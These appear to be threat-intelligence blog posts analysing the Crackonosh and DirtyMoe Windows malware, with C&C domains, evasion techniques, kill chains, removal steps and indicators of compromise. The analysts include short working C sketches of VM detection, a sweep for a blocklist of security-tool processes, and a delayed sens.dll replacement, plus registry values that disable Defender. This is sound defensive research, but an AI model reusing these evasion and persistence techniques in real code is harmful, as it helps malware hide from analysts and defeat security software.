Analysis of winscomrssrv.dll

Winscomrssrv.dll is a preparation for the next phase. It uses TXT DNS records the same way as StartupCheckLibrary.dll and tries to decode TXT records from the following domains:

  • fgh[.]roboticseldomfutures[.]info
  • anter[.]roboticseldomfutures[.]info
  • any[.]tshirtcheapbusiness[.]net
  • lef[.]loadtubevideos[.]com
  • levi[.]loadtubevideos[.]com
  • gof[.]planetgoodimages[.]info
  • dus[.]bridgetowncityphotos[.]org
  • ofl[.]bridgetowncityphotos[.]org
  • duo[.]motortestingpublic[.]com
  • asw[.]animegogofilms[.]info
  • wc[.]animegogofilms[.]info
  • enu[.]andromediacenter[.]net
  • dnn[.]duckduckanimesdownload[.]net
  • vfog[.]duckduckanimesdownload[.]net
  • sto[.]genomdevelsites[.]org
  • sc[.]stocktradingservices[.]org
  • ali[.]stocktradingservices[.]org
  • fgo[.]darestopedunno[.]com
  • dvd[.]computerpartservices[.]info
  • efco[.]computerpartservices[.]info
  • plo[.]antropoledia[.]info
  • lp[.]junglewearshirts[.]net
  • um[.]junglewearshirts[.]net
  • fri[.]rainbowobservehome[.]net
  • internal[.]videoservicesxvid[.]com
  • daci[.]videoservicesxvid[.]com
  • dow[.]moonexploringfromhome[.]info
  • net[.]todayaniversarygifts[.]info
  • sego[.]todayaniversarygifts[.]info
  • pol[.]motorcyclesonthehighway[.]com
  • any[.]andycopyprinter[.]net
  • onl[.]andycopyprinter[.]net
  • cvh[.]cheapjewelleryathome[.]info
  • df[.]dvdstoreshopper[.]org
  • efr[.]dvdstoreshopper[.]org
  • Sdf[.]expensivecarshomerepair[.]com

It seems that these files are not yet in the wild, but we know what the file names should be:

C:\WINDOWS\System32\wrsrvrcomd0.dll, C:\WINDOWS\System32\winupdtemp_0.dat and C:\WINDOWS\System32\winuptddm0.

Anti-Detection and Anti-Forensics

As noted before, Crackonosh takes specific actions to evade security software and analysis.

The specific actions it takes to evade and disable security software include:

  • Deleting antivirus software in safe mode
  • Stopping Windows Update
  • Replacing Windows Security with green tick system tray icon
  • Using libraries that are not started through the usual DllMain entry point when run as the main executable (by rundll32.exe), but through other exported functions
  • Serviceinstaller checks whether it is running in Safe mode

To hinder analysis, it performs the following checks to determine whether it is running in a VM (a small sketch of the registry probe follows the list):

  • Checks registry keys:
    • SOFTWARE\VMware, Inc
    • SOFTWARE\Microsoft\Virtual Machine\Guest\Parameters
    • SOFTWARE\Oracle\VirtualBox Guest Additions
  • Tests whether the computer time falls within a reasonable interval, e.g. after the malware's creation and before 2023 (wksprtcli.dll)
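
A minimal sketch of the registry probe: the key paths mirror the list above, the function names are ours, and the program needs to be linked against advapi32.

#include <windows.h>
#include <stdio.h>

static BOOL key_exists(const char *subkey)
{
    HKEY h;
    if (RegOpenKeyExA(HKEY_LOCAL_MACHINE, subkey, 0, KEY_READ, &h) == ERROR_SUCCESS) {
        RegCloseKey(h);
        return TRUE;
    }
    return FALSE;
}

int main(void)
{
    const char *vm_keys[] = {
        "SOFTWARE\\VMware, Inc",
        "SOFTWARE\\Microsoft\\Virtual Machine\\Guest\\Parameters",
        "SOFTWARE\\Oracle\\VirtualBox Guest Additions",
    };
    for (int i = 0; i < 3; i++)
        if (key_exists(vm_keys[i]))
            printf("VM indicator found: HKLM\\%s\n", vm_keys[i]);
    return 0;
}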

Also, as noted, it delays running to better hide itself. We found that the installers use hardcoded dates and times for this delay, as shown below.

SHA of installer Installer doesn’t run before
9EC3DE9BB9462821B5D034D43A9A5DE0715FF741E0C171ADFD7697134B936FA3 2018-06-10 13:08:20
8C52E5CC07710BF7F8B51B075D9F25CD2ECE58FD11D2944C6AB9BF62B7FBFA05 2018-06-19 14:06:37
93A3B50069C463B1158A9BB3A8E3EDF9767E8F412C1140903B9FE674D81E32F0 2018-07-04 17:33:20
6A3C8A3CA0376E295A2A9005DFBA0EB55D37D5B7BF8FCF108F4FFF7778F47584 2018-07-10 15:35:57
4B01A9C1C7F0AF74AA1DA11F8BB3FC8ECC3719C2C6F4AD820B31108923AC7B71 2018-07-25 13:56:35
65F39206FE7B706DED5D7A2DB74E900D4FAE539421C3167233139B5B5E125B8A 2018-08-03 15:50:40
C6817D6AFECDB89485887C0EE2B7AC84E4180323284E53994EF70B89C77768E1 2018-08-14 12:36:30
7F836B445D979870172FA108A47BA953B0C02D2076CAC22A5953EB05A683EDD4 2018-09-13 12:29:50
D8C092DE1BF9B355E9799105B146BAAB8C77C4449EAD2BDC4A5875769BB3FB8A 2018-10-01 13:52:22
E497EE189E16CAEF7C881C1C311D994AE75695C5087D09051BE59B0F0051A6CF 2018-10-19 14:15:35
D7A9BF98ACA2913699B234219FF8FDAA0F635E5DD3754B23D03D5C3441D94BFB 2018-11-07 12:47:30
Hardcoded timestamps in installers

We also found a version of winrmsrv.exe (5B85CEB558BAADED794E4DB8B8279E2AC42405896B143A63F8A334E6C6BBA3FB) that instead decrypts a time hardcoded in the config file (for example, in 5AB27EAB926755620C948E7F7A1FDC957C657AEB285F449A4A32EF8B1ADD92AC it is 2020-02-03). If the current system time is lower than the extracted value, winrmsrv.exe does not run.

It also takes specific actions to hide itself from possible power users who use tools that could disclose its presence.

It uses Windows-like names and descriptions, such as winlogui.exe, which is described as the Windows Logon GUI Application.

It also checks running processes and compares them against the blocklist below (a sketch of such a check follows the list). If a process with one of the listed names is found, winrmsrv.exe and winlogui.exe terminate themselves and wait until the next start of the PC.

  • Blocklist:
    • dumpcap.exe
    • fiddler.exe 
    • frst.exe 
    • frst64.exe 
    • fse2.exe 
    • mbar.exe 
    • messageanalyzer.exe 
    • netmon.exe 
    • networkminer.exe 
    • ollydbg.exe 
    • procdump.exe 
    • procdump64.exe 
    • procexp.exe 
    • procexp64.exe 
    • procmon.exe 
    • procmon64.exe 
    • rawshark.exe 
    • rootkitremover.exe 
    • sdscan.exe 
    • sdwelcome.exe 
    • splunk.exe 
    • splunkd.exe 
    • spyhunter4.exe 
    • taskmgr.exe
    • tshark.exe 
    • windbg.exe 
    • wireshark-gtk.exe 
    • wireshark.exe 
    • x32dbg.exe 
    • x64dbg.exe 
    • X96dbg.exe
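
A sketch of such a process sweep using the Toolhelp snapshot API; an ANSI build is assumed, the function name is ours, and what to do on a hit is left out.

#include <windows.h>
#include <tlhelp32.h>
#include <string.h>

/* Returns TRUE if any running process matches a name on the blocklist. */
static BOOL blocklisted_tool_running(const char **blocklist, int count)
{
    HANDLE snap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    PROCESSENTRY32 pe;
    BOOL found = FALSE;
    int i;

    if (snap == INVALID_HANDLE_VALUE)
        return FALSE;

    pe.dwSize = sizeof(pe);
    if (Process32First(snap, &pe)) {
        do {
            for (i = 0; i < count && !found; i++)
                if (_stricmp(pe.szExeFile, blocklist[i]) == 0)
                    found = TRUE;
        } while (!found && Process32Next(snap, &pe));
    }
    CloseHandle(snap);
    return found;
}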

Additional files

In addition to the components discussed previously, our research found these additional files:

  • Startupcheck.vbs: a one-time script that creates a Windows Task Scheduler task for StartUpCheckLibrary.dll.
  • Winlogui.dat, wslogon???.dat: temporary files to be moved into place as the new winlogui.exe.
  • Perfdish001.dat: a list of infected IP addresses found by winrmsrv.exe.
  • Install.msi and Install.vbs: in some versions, a step between maintenance.vbs and serviceinstaller.msi, containing commands that are otherwise in maintenance.vbs.

Removal of Crackonosh

Based on our analysis, the following steps are required to fully remove Crackonosh.

Delete the following Scheduled Tasks (Task Schedulers)

  • Microsoft\Windows\Maintenance\InstallWinSAT
  • Microsoft\Windows\Application Experience\StartupCheckLibrary
  • Microsoft\Windows\WDI\SrvHost\
  • Microsoft\Windows\Wininet\Winlogui\
  • Microsoft\Windows\Windows Error Reporting\winrmsrv\

Delete the following files from c:\Windows\system32\

  • 7B296FC0-376B-497d-B013-58F4D9633A22-5P-1.B5841A4C-A289-439d-8115-50AB69CD450
  • 7B296FC0-376B-497d-B013-58F4D9633A22-5P-1.B5841A4C-A289-439d-8115-50AB69CD450B
  • diskdriver.exe
  • maintenance.vbs
  • serviceinstaller.exe
  • serviceinstaller.msi
  • startupcheck.vbs
  • startupchecklibrary.dll
  • windfn.exe
  • winlogui.exe
  • winrmsrv.exe
  • winscomrssrv.dll
  • wksprtcli.dll

Delete the following file from C:\Documents and Settings\All Users\Local Settings\Application Data\Programs\Common (%localappdata%\Programs\Common)

  • UserAccountControlSettingsDevice.dat

Delete the following file from C:\Program Files\Windows Defender\

  • MSASCuiL.exe

Delete the following Windows registry values (using regedit.exe)

  • HKLM\SOFTWARE\Policies\Microsoft\Windows Defender value DisableAntiSpyware
  • HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection value DisableBehaviorMonitoring
  • HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection value DisableOnAccessProtection
  • HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection value DisableScanOnRealtimeEnable
  • HKLM\SOFTWARE\Microsoft\Security Center value AntiVirusDisableNotify
  • HKLM\SOFTWARE\Microsoft\Security Center value FirewallDisableNotify
  • HKLM\SOFTWARE\Microsoft\Security Center value UpdatesDisableNotify
  • HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer value HideSCAHealth
  • HKLM\SOFTWARE\Microsoft\Windows Defender\Reporting value DisableEnhancedNotifications
  • HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run value winlogui

Restore the following default Windows services (Note: depends on your OS version – see https://www.tenforums.com/tutorials/57567-restore-default-services-windows-10-a.html)

  • wuauserv
  • SecurityHealthService
  • WinDefend
  • Sense
  • MsMpSvc

Reinstall Windows Defender and any third-party security software, if any was installed.

Error messages

On infected machines, sometimes the following error messages about the file Maintenance.vbs can appear.

Type Mismatch: ‘CInt’, Code: 800A000D
Can not find script file

Both of these are bugs in the Crackonosh installation.

Although there are some guides on the internet on how to resolve these errors, instead we recommend following the steps in the previous chapter to be sure you fully remove all traces of Crackonosh.

Conclusion

Crackonosh installs itself by replacing critical Windows system files and abusing the Windows Safe mode to impair system defenses.

This malware further protects itself by disabling security software, operating system updates and employs other anti-analysis techniques to prevent discovery, making it very difficult to detect and remove.

In summary, Crackonosh shows the risks in downloading cracked software and demonstrates that it is highly profitable for attackers. Crackonosh has been circulating since at least June 2018 and has yielded over $2,000,000 USD for its authors in Monero from over 222,000 infected systems worldwide.

As long as people continue to download cracked software, attacks like these will continue to be profitable for attackers. The key take-away from this is that you really can’t get something for nothing and when you try to steal software, odds are someone is trying to steal from you.

Indicators of Compromise (IoCs)

Public keys

—–BEGIN PUBLIC KEY—–
MIIEIjANBgkqhkiG9w0BAQEFAAOCBA8AMIIECgKCBAEA0m9mblXlLhgH/d5WgDw0
2nzOynQvKdkobluX5zFK6ewVkX+3W6Vv2v4CqJ473ti9798Jt9jkDpfEL1yMUDfp
Lp1p4XGVSrTrD16J0Guxx0yzIjyReAzJ8Kazej1z/XGGOtAMZCoLI+TrE4me3SjL
+EXk3pXqyupAgKFiNrlXRj7hbb5vXkeB0MpbV3yJ0ha1OJdAIAwGzQTUsvDWDw00
4sxLfso6CLzR1CKJEH2wT6RVfalnGg6IBwb/fvGewGYECAfnPtEt8TwvzuLsw6NY
BD+tDNcFQk0ZRIAZ+zO5mY4cuWTTBZbAjEFFo5UX4ognHDElltgh+76rXDvtXmeZ
ivDOgJSBXr2+TkQ9dMfYMYLxKHoe8WRBYlI6Wkl59+HQQdQFgSGK6tFtY0T3TVwR
ZxQE1LYwe+0lF1Cop8U/jqRotudKcS+Hyiu0yoSv34C3QwW4ELQktCX5313gcNF/
RA98knE1tl9F3Pl6vnvm1ILb6cxihYy5F0rdLteRNezrjcXOKGA9BV4QTebxH/mi
mm6z4BtTBPNKvrtqo25qx5Oa0fOnVvHAaVtXNjzCNapZwucHH/V8jJzIwcv2ZUP4
Hx9Hkpm5u/3payfDPkWHFwxh3qfDDr2jzgwDjRSOgO1GHGuL1HoIxSgxWFOf6F2z
caOwDrcycDbWiIMeZedJQI1XTrCPoFL4YoyPY2at9tAYW+6Z3gvnvbhen803N2/k
0TWEUU1hUfhOn45IC5r3pCC8Ouy7FIblz1wGm8Qfa8uSD3hxPhaev1G2JJpN4ZVN
UEfeVH6rVcsbQmKoB0xgmcn5Qnq4WoRGtTd1Z4bbC2Zl2q4jqDAutxWdtmEahmcN
OZoTpAjfN96eQReDYLHYkY9SmdjmclnXGo6SP2VHdlm+Xf5DU7E+0c1WNNb2fGN8
+XY29XLuesCppPyeCejMEgIIfIm6A0ltRtwdRHzqgLaY3o6Q6KTvMCQY2zEwKvx8
h1u5CLNpJ0yajbvaO41g4uKBtAPL+N9knsfnIqwG1r7emocrUbj3Nou9mPvtTVHr
r6ZRCmXbdhXTFL6ztLEGYt4wYwvJfKXlgk+3LFECffw0LpjUXEJVtzb//eI4rEyq
J99exvMzQJ5ELLwpRT/Ehq4D7ngc5V/LGQvGNG5MUnzjDF5Ja5W56HcYRVCj8+CV
jHzOUMx1Ojzeb9L87dS+neATWLr+26kMBALr7lEi37483oLQcD5W4bKspQmMdOJb
ED8MEVTd1V6/lTfcBRiHmEdHazV6OnxZsriXQ6MQtnS5WYKjaCwnv2QfUAtfspeO
tGeIalZIdY/MpABHnmhOQZc5rRXrsEU028zmD52OXTXVfnklhhZjHm9QOX6D4fM3
kQIDAQAB
—–END PUBLIC KEY—–
—–BEGIN PUBLIC KEY—–
MIIEfDANBgkqhkiG9w0BAQEFAAOCBGkAMIIEZAKCBFsAuwkH5cn5zS75ZQpdViD/
L5gUpjnJXJL1rWB0toEICF58mkjpR8DGR+Nl3IXgyjSdKprFUU7pVhO5kmlgiId/
VqbBQZdwKaLxi4oeg4zzVQ7ACwanU1eYqOCNoAsrdcuWkytnPUcLRC3VtE5POp1n
skiPiKNt4aWvzXw61+o+ROEQhKcsYaB3Xu34X1HPxI1HSFhPLxuj20Gfiu3Aol3r
mGdxLWa/sVbkYzyinocrVRl09+Tys0JYq1hc+q6ZR3fN1wOqOQm7dlksmPLDAhIi
9AFyKPrdiLc30kpMP3dpZT/IilkRebcrlufiDgXpAij2t6zzHC5cjn4eCOV80kzJ
qgw8oMAww0K2jvhwTWlRkvvAWtkbHUL9VRX69NFAJOuAPsHNv7ScWiy4EW4KxlFd
zR0B6hzsOc/bo0ns5ffrtOFPao1yW7h4BqE8AYpENwKmygQCh+e211Gd0ABD4131
nNYuZokyYXLLEuzwEjzJlw0bKbwn6suVPA8WAa53iy43/5LWQFfWB3AK8qolJ6ck
vyNLJiMtMa1Q+K3pcRndfQpLMsI19ZZyz67Rh0T+QqDt2XQ5gT4gnmPlc2wB3Y7X
2XoZHQZ8FRgYxhS2Szurmn/70NeZEq6p4Zr+yj0FqEjNvR1ooUz5pwJ6iJSmXRtN
ifaBHKhmc4l5ZIUOUkhtsQ1bmsII092gtLPrLkU7hC1hG9vSzUEh6myLs/pqIKTj
x+s+tHqF34XuvNMJOAcv7dXIiQ0QqfG1bFFP6WItwNyeRRGVIkik6GZuAe3lXV5d
bcKr+ID6pZBeI+yN6y+ugX900WZHKZCfSWvAEQDDZW7TCe0sBQpq083B1GVQOg9t
3MM43PqdYrVgH0fRYa6YJ0SrvhFEIjaevszmOYo+eE5P3GHuL4ty45LrkE91qTWk
fYexEQ0QhCsmBFCu+oX/EI6NpAm636zoc9qPZScZBgIAStYCJJt6pIzDr3tq0BFR
oA3CklsFrKloDgx3rBZgNJk4lpWd9kihNRq7EzI8Y/YbAA0SlgkfXj6/4s0B0ODi
2xirUJzhzQnJuvXFdirwoRpHglMtIOhmfy0fMnvorDbmxGyMVM4n44nGLLrqaZj1
+8QWi9PixPNWgznPBeQaT7q78IPooWn9H/efJ2Rb602iW8H9NSbp/Mt2+Qa4O2Cg
ATymvrRG6oyCgNF5L1fUpGQNQpD3PzSyrTdyjEIabjPpPD+doXPq3y+sEYvWVwDc
96SwVSB7oZ3Bj4/tW7IJ4FhPzXcrBl0RsdURHHhJsHPHSQH6QRtebKcc+3TemhN5
CcXjHmETcB0a0FJ6DXNm4iQZx+t/q8F0ZYnBGhR7aAYu5wl5ofJxGFTQkc5KisYh
B6XogfPM7GT5Zw2B7omiXiGHKALXerzQP831+gL8Zso6ZIWGM3F+PJqQarfn0wnT
xQ264rjtnSKnSkfaDRGxpBYyMDF3CxMPHYsmv7K5lF4be5ASK64VexloUQIDAQAB
—–END PUBLIC KEY—–

The post Crackonosh: A New Malware Distributed in Cracked Software appeared first on Avast Threat Labs.

DirtyMoe: Introduction and General Overview of Modularized Malware

16 June 2021 at 11:56

Abstract

The rising price of the cryptocurrency has caused a skyrocketing trend of malware samples in the wild. DDoS attacks go hand in hand with the mining of cryptocurrencies to increase the attackers’ revenue/profitability. Moreover, the temptation grows if you have thousands of victims at your disposal.

This article presents the results of our recent research on the DirtyMoe malware. We noticed that the NuggetPhantom malware [1] was the first version of DirtyMoe and that PurpleFox is its exploit kit [2]. We date the first mention of the malware to 2016. The malware has followed a fascinating evolution over the last few years. The first samples were often unstable and produced obvious symptoms. Nonetheless, the current samples are on par with other malware in their use of anti-forensic, anti-tracking, and anti-debugging techniques.

The DirtyMoe malware uses a simple idea of how to be modularized, undetectable, and untrackable at the same time. The aim of this malware is focused on Cryptojacking and DDoS attacks. DirtyMoe is run as a Windows service under system-level privileges via EternalBlue and at least three other exploits. The particular functionality is controlled remotely by the malware authors who can reconfigure thousands of DirtyMoe instances to the desired functionality within a few hours. DirtyMoe just downloads an encrypted payload, corresponding to the required functionality, and injects the payload into itself.

DirtyMoe’s self-defense and hiding techniques can be found at local and network malware layers. The core of the DirtyMoe is the service that is protected by VMProtect. It extracts a Windows driver that utilizes various rootkit capabilities such as service, registry entry, and driver hiding. Additionally, the driver can hide selected files on the system volume and can inject an arbitrary DLL into each newly created process in the system. The network communication with a mother server is not hard-coded and is not invoked directly. DirtyMoe makes a DNS request to one hard-coded domain using a set of hardcoded DNS servers. However,  the final IP address and port are derived using another sequence of DNS requests. So, blocking one final IP address does not neutralize the malware, and we also cannot block DNS requests to DNS servers such as Google, Cloudflare, etc.

This is the first article of the DirtyMoe series. In it, we present a high-level overview of DirtyMoe's complex architecture. The following articles will focus on detailed aspects of that architecture, such as the driver, services, modules, etc. Here we describe DirtyMoe's kill chain, sophisticated network communication, self-protection techniques, and significant symptoms. Further, we present statistical information about the prevalence and location of the malware and its C&C servers. Finally, we discuss and summarize the relationship between DirtyMoe and PurpleFox. Indicators of Compromise will be published in future posts for each malware component.

1. Kill Chain

The following figures illustrate two views of the DirtyMoe architecture: the first covers delivery, and the second covers exploitation and installation. The individual kill chain items are described in the following subsections.

Figure 1. Kill Chain: Delivery
Figure 2. Kill Chain: Exploitation and Installation

1.2 Reconnaissance

Through port scanning and open vulnerability databases, the attackers find and target a large number of weak computers. PurpleFox is the exploit kit commonly used for DirtyMoe.

1.3 Weaponization

The DirtyMoe authors apply several techniques to gain admin privileges for a DirtyMoe deployment.

One of the favorite exploits is EternalBlue (CVE-2017-0144), although this vulnerability has been well known since 2017. Avast still blocks around 20 million EternalBlue attack attempts every month. Unfortunately, a million machines still operate with the vulnerable SMBv1 protocol, opening the door to malware, including DirtyMoe, via privilege escalation [3]. Recently, a new infection vector that cracks Windows machines through SMB password brute force has been on the rise [2].

Another way to infect a victim machine with DirtyMoe is phishing emails containing URLs that can exploit targets via Internet Explorer; for instance, the Scripting Engine Memory Corruption Vulnerability (CVE-2020-0674). The vulnerability corrupts memory so that the attacker's code runs in the context of the current user. So, if the attacker is lucky enough to hit an administrator login, the code takes control of the affected machine [4]. One wonders how many users still regularly use Internet Explorer with this vulnerability.

Further, a wide range of infected files is used to deploy DirtyMoe. Cracks, keygens, and even legitimate-looking applications can contain malicious code that installs the malware on victim machines as part of their execution. The installation is customarily done silently in the background, without user interaction or the user's knowledge. Infected macros, self-extracting archives, and repacked installers of popular applications are the typical groups.

We have given the most well-known examples above, but the ways to deploy malware are unlimited. They all have one thing in common: Common Vulnerabilities and Exposures (CVEs). A description of the exact method used to install DirtyMoe is out of this article's scope; however, a short list of CVEs used for DirtyMoe follows:

  • CVE-2019-1458, CVE-2015-1701, CVE-2018-8120: Win32k Elevation of Privilege Vulnerability
  • CVE-2014-6332: Windows OLE Automation Array Remote Code Execution Vulnerability

1.4 Delivery

When one of the exploits is successful and gains system privileges, DirtyMoe can be installed on a victim’s machine. We observe that DirtyMoe utilizes Windows MSI Installer to deploy the malware. MSI Installer provides an easy way to install proper software across several platforms and versions of Windows. Each version requires a different location of installed files and registry entries. The malware author can comfortably set up DirtyMoe configurations for the target system and platform.

1.4.1 MSI Installer Package

Via the MSI installer, the malware authors prepare the victim environment into the proper state. They focus on disabling anti-spyware and file-protection features. Additionally, the MSI package uses one system feature that helps to overwrite system files for malware deployment.

Registry Manipulation

There are several registry manipulations during MSI installation. The most crucial registry entries are described in the following overview:

  • Microsoft Defender Antivirus can be disabled by the DisableAntiSpyware registry key set to 1.
    • HKCU\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware
  • Windows File Protection (WFP) of critical Windows system files is disabled.
    • HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SFCDisable
    • HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SFCScan
  • Disables SMB sharing to prevent infection by other malware
    • HKLM\SYSTEM\CurrentControlSet\Services\NetBT\Parameters\SMBDeviceEnabled
  • Replaces system files with the malicious ones
    • HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\AllowProtectedRenames
    • HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\PendingFileRenameOperations
  • Sets the threshold to the maximum value to ensure that each service runs as a thread rather than as a separate process.
    • HKLM\SYSTEM\CurrentControlSet\Control\SvcHostSplitThresholdInKB

File Manipulation

The MSI installer copies files to defined destinations if an appropriate condition is met, as the following table summarizes.

File Destination Condition
sysupdate.log WindowsFolder Always
winupdate32.log WindowsFolder NOT VersionNT64
winupdate64.log WindowsFolder VersionNT64

Windows Session Manager (smss.exe) copies the files during Windows startup according to the PendingFileRenameOperations registry value, as follows (a sketch of the underlying delayed-rename mechanism follows the list):

  • Delete (if exist) \\[WindowsFolder]\\AppPatch\\Acpsens.dll
  • Move \\[SystemFolder]\\sens.dll to \\[WindowsFolder]\\AppPatch\\Acpsens.dll
  • Move \\[WindowsFolder]\\winupdate[64,32].log to \\[SystemFolder]\\sens.dll
  • Delete (if exist) \\[WindowsFolder]\\AppPatch\\Ke583427.xsl
  • Move \\[WindowsFolder]\\sysupdate.log to \\[WindowsFolder]\\AppPatch\\Ke583427.xsl
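
For context, this is the same delayed-rename mechanism that the documented MoveFileEx API exposes: queuing a rename with MOVEFILE_DELAY_UNTIL_REBOOT lands in PendingFileRenameOperations, which smss.exe processes at boot. The installer writes the registry value directly, so the call below only sketches the mechanism, and the paths are illustrative.

#include <windows.h>

int main(void)
{
    /* Queue a replace-on-reboot of sens.dll, mirroring the file moves
       listed above; requires administrative privileges. */
    MoveFileExA("C:\\Windows\\winupdate64.log",
                "C:\\Windows\\System32\\sens.dll",
                MOVEFILE_DELAY_UNTIL_REBOOT | MOVEFILE_REPLACE_EXISTING);
    return 0;
}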

1.4.2 MSI Installation

The MSI installer can be run silently without the need for user interaction. The installation requires a system restart to apply all changes, but the MSI installer supports delayed restart, so the user does not notice any suspicious symptoms. The MSI installer prepares all necessary files and configurations to deploy the DirtyMoe malware. After the system reboot, the system overwrites the defined system files, and the malware is run. We will describe the detailed analysis of the MSI package in a separate article.

1.5 Exploitation

The MSI package overwrites the system file sens.dll via the Windows Session Manager. Therefore, DirtyMoe abuses the Windows System Event Notification Service (SENS) to be started by the system. The infected SENS service is a mediator which deploys the DirtyMoe Service.

In the first phase, the abused service ensures that DirtyMoe will be loaded after the system reboot and restores the misused Windows service to the original state. Secondly, the main DirtyMoe service is started, and a rootkit driver hides the DirtyMoe’s services, registry entries, and files.

1.5.1 Infected SENS Service

Windows runs the original SENS under NT AUTHORITY\SYSTEM user. So, DirtyMoe gains system-level privileges. DirtyMoe must complete three basic objectives on the first run of the infected SENS Service.

  1. Rootkit Driver Loading
    DirtyMoe runs in user mode, but the malware needs support from kernel space. Most kernel actions try to hide or anti-track DirtyMoe activities. A driver binary is embedded in the DirtyMoe service, which loads the driver when DirtyMoe starts.
  2. DirtyMoe Service Registration
    The infected SENS Service registers the DirtyMoe Service in the system as a regular Windows service. Consequently, the DirtyMoe malware can survive the system reboot. The DirtyMoe driver is activated at this time; hence the newly created service is hidden too. DirtyMoe Service is the main executive unit that maintains all malware activities.
  3. System Event Notification Service Recovery
    If the DirtyMoe installation and service deployment is successful, the last step of the infected SENS Service is to recover the original SENS service from the Acpsens.dll backup file; see File Manipulation.

1.5.2 DirtyMoe Service

DirtyMoe Service is registered in the system during the malware's deployment. At the start, the service extracts and loads the DirtyMoe driver to protect itself. When the driver is loaded, the service cleans up all evidence of the driver from the file system and registry.

The DirtyMoe malware is composed of two processes, DirtyMoe Core and DirtyMoe Executioner, created by the DirtyMoe service, which terminates itself once the processes are created and configured. The service spawns the Core and Executioner processes through several intermediate processes and threads that are terminated over time, which makes forensics and tracking more difficult. The DirtyMoe services and processes will be described in detail in a future article.

1.6 Installation

All we described above is only preparation for malicious execution. DirtyMoe Core is the maintenance process that manages downloading, updating, encrypting, backing up, and protecting the DirtyMoe malware. DirtyMoe Core is responsible for injecting malicious code into DirtyMoe Executioner, which executes it. The injected code, called a MOE Object or Module, is downloaded from a C&C server. MOE Objects are encrypted PE files that DirtyMoe Core decrypts and injects into DirtyMoe Executioner.

Additionally, the initial payload that determines the introductory behavior of DirtyMoe Core is deployed by the MSI Installer as the sysupdate.log file. Therefore, DirtyMoe Core can update or change its own functionality by payload injection.

1.7 Command and Control

DirtyMoe Core and DirtyMoe Executioner provide an interface for the malware authors who can modularize DirtyMoe remotely and change the purpose and configuration via MOE Objects. DirtyMoe Core communicates with the command and control (C&C) server to obtain attacker commands. Accordingly, the whole complex hierarchy is highly modularized and is very flexible to configuration and control.

The insidiousness of the C&C communication is that DirtyMoe does not use fixed IP addresses but implements a unique mechanism to obfuscate the final C&C server address. So, it is impossible to block the C&C server on a victim’s machine since the server address is different for each C&C communication. Moreover, the mechanism is based on DNS requests which cannot be easily blocked because it would affect everyday communications.

1.8 Actions on Objective

Regarding DirtyMoe modularization, crypto-mining seems to be a continuous activity that uses victim machines permanently if malware authors do not need to make targeted attacks. So, crypto-mining is an activity at a time of peace. However, the NSFOCUS Threat Intelligence center discovered distributed denial-of-service (DDoS) attacks [1]. In general, DirtyMoe can deploy arbitrary malware into infected systems, such as information stealer, ransomware, trojan, etc.

2. Network Communication

As mentioned above, the network communication with the C&C server is sophisticated. The IP address of the C&C server is not hardcoded because it is derived from DNS requests. Three pieces of information are hardcoded in the code.

  1. A list of public DNS servers such as Google, Cloudflare, etc.
  2. A hard-coded domain rpc[.]1qw[.]us is an entry point to get the final IP address of the C&C server.
  3. Bulgarian constants that are used for the translation of IP addresses.

A DNS request to the 1qw[.]us domain returns a list of live servers, but none of them is the final C&C server. DirtyMoe converts the returned IP address to an integer and subtracts the first Bulgarian constant (a value chosen so the result comes out right) to calculate the final C&C IP address. To make things even worse, a C&C port is also derived from the final IP address using the second Bulgarian constant.
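
Only the subtraction step is sketched below; the real constants, the byte order, and the port formula are not reproduced, so the values are placeholders.

#include <stdint.h>
#include <stdio.h>

/* Final C&C address = resolved address (as an integer) minus the first
   constant; the port derivation and the real constants are omitted. */
static uint32_t cc_address(uint32_t resolved_ip, uint32_t constant1)
{
    return resolved_ip - constant1;
}

int main(void)
{
    uint32_t resolved  = 0x5DB8D822u;   /* dummy resolved IP in host byte order */
    uint32_t constant1 = 0x01020304u;   /* placeholder constant */
    uint32_t ip = cc_address(resolved, constant1);

    printf("derived C&C IP: %u.%u.%u.%u\n",
           ip >> 24, (ip >> 16) & 0xFF, (ip >> 8) & 0xFF, ip & 0xFF);
    return 0;
}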

The insidiousness of the translation lies in its use of DNS requests, which cannot be easily blocked because users need IP resolution. DirtyMoe sends requests to public DNS servers that resolve the 1qw[.]us domain recursively. Therefore, user machines do not contact the malicious domain directly but via one of the hardcoded domain name servers. Moreover, the list of returned IP addresses changes every minute.

We have recorded approximately 2,000 IP addresses to date. Many translated IP addresses lead to live web servers, mostly with Chinese content. It is unclear whether the malware author owns the web servers or whether they are simply compromised by DirtyMoe.

3. Statistics

We observed the first significant occurrence of DirtyMoe in 2017. The number of DirtyMoe hits was in the thousands between 2018 and 2020.

3.1 DirtyMoe Hits

The number of incidents has increased by orders of magnitude this year, as the logarithmic scale of Figure 3 indicates. On the other hand, it must be noted that we improved our detection of DirtyMoe in 2020. We have recorded approximately one hundred thousand infected and active machines to date. However, it is evident that the DirtyMoe malware is still active and on the rise. Therefore, we will have to watch out and stay sharp.

Figure 3. Annual occurrences of DirtyMoe hits

The dominant country of DirtyMoe hits is Russia, specifically 65 k of 245 k hits; see Figure 4. DirtyMoe leads in Europe and Asia, as Figure 5 illustrates. The Americas also have a significant share of hits.

Figure 4. Distribution of hits by country
Figure 5. Distribution of hits by continent

3.2 C&C Servers

We observed a different distribution of countries and continents for C&C servers (IP addresses) than for sample hits. Most of the C&C servers are located in China, as Figures 6 and 7 demonstrate. We can deduce that the malware's source is located in China. It is evident that the malware authors are a well-organized group that operates on all major continents.

Figure 6. Distribution of C&C servers by country
Figure 7. Distribution of C&C servers by continent

3.3 VMProtect

In the last two years, DirtyMoe has used the volume ID of the victim's machine as the name of the service DLL. The first versions of DirtyMoe used a randomly selected Windows service name, which was dominant in 2018; see Figure 8.

Figure 8. Distribution of cases using service names

